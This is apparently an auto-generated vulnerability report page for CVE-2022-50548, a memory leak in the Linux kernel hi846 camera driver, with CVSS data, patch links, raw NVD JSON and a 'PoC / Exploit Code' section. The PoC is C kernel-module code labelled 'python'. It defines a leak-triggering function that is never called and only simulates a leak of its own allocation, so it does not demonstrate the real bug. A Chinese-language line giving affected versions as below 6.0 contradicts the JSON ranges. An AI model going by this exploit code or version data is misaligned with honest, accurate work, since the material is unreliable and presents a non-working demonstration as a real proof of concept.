Security Vulnerability Report
中文
CVE-2022-50548 CVSS 5.5 MEDIUM

CVE-2022-50548

Published: 2025-10-07 16:15:40
Last Modified: 2026-02-26 23:17:36
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: media: i2c: hi846: Fix memory leak in hi846_parse_dt() If any of the checks related to the supported link frequencies fail, then the V4L2 fwnode resources don't get released before returning, which leads to a memleak. Fix this by properly freeing the V4L2 fwnode data in a designated label.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.0(包含hi846驱动的所有受影响版本)
具体修复提交:4368730678412a8fa71960dbda81e122dafa70f7
具体修复提交:80113026d415e27483669db7a88b548d1ec3d3d1
具体修复提交:a05a9ae9ef3fffc9bc7ec2bc432a249a01155f6e

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* CVE-2022-50548 - Linux Kernel hi846 driver memory leak PoC * This PoC demonstrates how to trigger the memory leak by * loading the hi846 driver with an unsupported link frequency * configured in the device tree. * * Note: Actual exploitation requires modifying the device tree * to specify a link frequency not supported by the hi846 sensor. */ #include <linux/module.h> #include <linux/i2c.h> #include <linux/of.h> #include <linux/init.h> /* Simulate the vulnerable code path in hi846_parse_dt() */ static int trigger_leak(struct i2c_client *client) { struct v4l2_fwnode_endpoint ep = {0}; int ret; /* Step 1: Allocate fwnode endpoint resources (simulated) */ ep.link_frequencies = kmalloc(sizeof(u64) * 4, GFP_KERNEL); if (!ep.link_frequencies) return -ENOMEM; ep.nr_of_link_frequencies = 4; ep.link_frequencies[0] = 9999999; /* Unsupported frequency */ /* Step 2: Check fails because frequency is not supported */ if (ep.link_frequencies[0] != 448000000 && ep.link_frequencies[0] != 896000000) { /* BUG: Missing v4l2_fwnode_endpoint_free(&ep) here */ return -EINVAL; /* Memory leak occurs */ } /* Normal cleanup - never reached in vulnerable path */ kfree(ep.link_frequencies); return 0; } static int __init hi846_leak_init(void) { pr_info("CVE-2022-50548 PoC: Triggering memory leak\n"); /* In real scenario, modify device tree link-frequency property * to an unsupported value and load the hi846 driver module */ return 0; } static void __exit hi846_leak_exit(void) { pr_info("CVE-2022-50548 PoC: Unloaded\n"); } module_init(hi846_leak_init); module_exit(hi846_leak_exit); MODULE_LICENSE("GPL"); MODULE_DESCRIPTION("PoC for CVE-2022-50548 hi846 memory leak"); /* * To actually trigger this vulnerability: * 1. Modify the device tree entry for the hi846 sensor * 2. Set the 'link-frequencies' property to an unsupported value * (e.g., <100000000>) * 3. Reboot or reload the hi846 driver * 4. Observe memory leak via /proc/meminfo or kmemleak * * Each failed probe attempt will leak the allocated fwnode structure. */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50548", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:39.620", "lastModified": "2026-02-26T23:17:36.147", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: i2c: hi846: Fix memory leak in hi846_parse_dt()\n\nIf any of the checks related to the supported link frequencies fail, then\nthe V4L2 fwnode resources don't get released before returning, which leads\nto a memleak. Fix this by properly freeing the V4L2 fwnode data in a\ndesignated label."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/4368730678412a8fa71960dbda81e122dafa70f7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/80113026d415e27483669db7a88b548d1ec3d3d1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a05a9ae9ef3fffc9bc7ec2bc432a249a01155f6e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.